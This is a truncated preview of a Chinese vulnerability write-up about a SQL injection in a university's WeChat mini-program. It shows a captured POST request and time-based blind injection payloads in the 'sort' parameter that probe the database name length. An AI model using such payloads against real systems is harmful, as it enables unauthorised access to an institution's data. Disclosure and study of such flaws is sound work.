文章预览
某大学校小程序存在sql注入(关键字注入) burp拦截请求包,点击行页旁边的排序,随便选一个,抓包,参数sort存在排序注入 POST /xxx-mobile/xxxList/findMoreAlumniuser HTTP/1.1 Host : x.x.x.x Content-Length : 33 Xweb_xhr : 1 Orgcode : hunau Mtoken : User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF XWEB/8447 Content-Type : application/json Accept : */* Sec-Fetch-Site : cross-site Sec-Fetch-Mode : cors Sec-Fetch-Dest : empty Referer : Accept-Encoding : gzip, deflate Accept-Language : zh-CN,zh;q=0.9 Connection : close "page" : 1 , "size" : 20 , "sort" : "asc" payload: "sort" : "asc,1/if(length(database())=6,sleep(3),0)" 执行长度至6时出现报错 对比长度7 "sort":"asc,1/if(length(database())=7,sleep(3),0)" 页面正常回显 使用截取函数截取数据库首字
………………………………
